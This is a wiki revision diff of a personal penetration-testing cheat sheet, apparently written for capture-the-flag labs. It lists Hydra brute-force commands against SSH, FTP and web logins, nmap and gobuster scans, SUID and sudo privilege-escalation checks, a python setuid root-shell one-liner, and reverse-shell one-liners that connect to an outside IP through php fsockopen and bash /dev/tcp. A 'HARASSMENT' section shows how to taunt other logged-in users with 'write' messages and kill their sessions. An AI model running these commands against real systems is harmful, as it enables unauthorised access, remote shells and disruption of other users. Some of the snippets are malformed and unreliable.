Difference between revisions of "Enumeration"
| Line 1: | Line 1: | ||
| + | ====== === Hydra === ====== | ||
| + | <nowiki>#</nowiki> If you need to bruteforce SSH. | ||
| + | |||
| + | hydra -L /home/user/list.txt -P /usr/share/wordlists/passlist.txt 0.0.0.0 ssh | ||
| + | |||
| + | <nowiki>#</nowiki> If you need to bruteforce FTP. | ||
| + | |||
| + | hydra -L /home/user/list.txt -P /usr/share/wordlists/rockyou.txt <nowiki>ftp://0.0.0.0</nowiki> | ||
| + | |||
| + | <nowiki>#</nowiki> If you need to bruteforce an HTTP (POST) form. | ||
| + | |||
| + | hydra -L /home/user/list.txt -P /usr/share/wordlists/passlist.txt 0.0.0.0 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V | ||
| + | |||
| + | <br /> | ||
| + | |||
| + | ====== '''=== Directory Enumeration ===''' ====== | ||
| + | |||
| + | |||
NMAP the IP address, and perform servide scan. | NMAP the IP address, and perform servide scan. | ||
| Line 22: | Line 40: | ||
nmap -sS -A 10.10.210.9 | nmap -sS -A 10.10.210.9 | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
linpeas if access to linux machine | linpeas if access to linux machine | ||
Revision as of 21:54, 11 November 2020
=== Hydra ===
# If you need to bruteforce SSH.
hydra -L /home/user/list.txt -P /usr/share/wordlists/passlist.txt 0.0.0.0 ssh
# If you need to bruteforce FTP.
hydra -L /home/user/list.txt -P /usr/share/wordlists/rockyou.txt ftp://0.0.0.0
# If you need to bruteforce an HTTP (POST) form.
hydra -L /home/user/list.txt -P /usr/share/wordlists/passlist.txt 0.0.0.0 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V
=== Directory Enumeration ===
NMAP the IP address, and perform servide scan.
GOBUSTER each IP address and port.
HASH-IDENTIFIER any hashes found.
!! IF ACCESS GAINED !!
CHECK /etc/password
CHECK /etc/crontab
*** STEGONAGRAPHY ***
steghide extract -sf <filename>
stegcrack <filename> <wordlist>
ffuf -w /usr/share/wordlists/common.txt -u http://0.0.0.0/FUZZ -t 120
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.210.9/hidden
nmap -sS -A 10.10.210.9
linpeas if access to linux machine
***
ALWAYS TRY TO RUN 'sudo -l'
For every user: find / -type f -perm -u=s 2>/dev/null; getcap -r / 2>/dev/null
/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
****
***
ALWAYS 'sudo -l' IF YOU GAIN ACCESS
SEE IF YOU CAN FIND /BIN/BASH or /BIN/SH for ESCALATION WITH "NOPASSSWD"
***
***
REVERSE SHELLS
php -r $sock=fsockopen(“192.168.0.195”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’
bash -i >& /dev/tcp/0.0.0.0/1234 0>&1
***
***
SHOW ALL OTHER CONNECTIONS
netstat -natp
***
** HARASSMENT **
There's probably an easier way, but I do this:
See who's logged into your machine -- use who or w:
> who
mmrozek tty1 Aug 17 10:03
mmrozek pts/3 Aug 17 10:09 (:pts/2:S.0)
Look up the process ID of the shell their TTY is connected to:
> ps t
PID TTY STAT TIME COMMAND
30737 pts/3 Ss 0:00 zsh
Laugh at their impending disconnection (this step is optional, but encouraged)
> echo "HAHAHAHAHAHAHAHA" | write mmrozek pts/3
Kill the corresponding process:
> kill -9 30737
HARASSMENT SCRIPT
#!/bin/bash/
while True
Do
echo '' | write username pta/?
Done
*** ONE LINER REVERSE SHELLS ***
https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
**SHOW IPS ON MACHIINE***
netstat -natlp
(kick them off with [kill -9 PID] after finding PID with [netstat -np | grep PORT])
=== FTP ===
If port 21 is open attempt to sign-in with anonymous (with randomized password).
If you can sign-in with anonymous (or other users) see if you can GET or PUT (don't forget to set lcd with 'lcd /usr/home/Downloads)
You can also check for hidden files with 'ls -alh'.
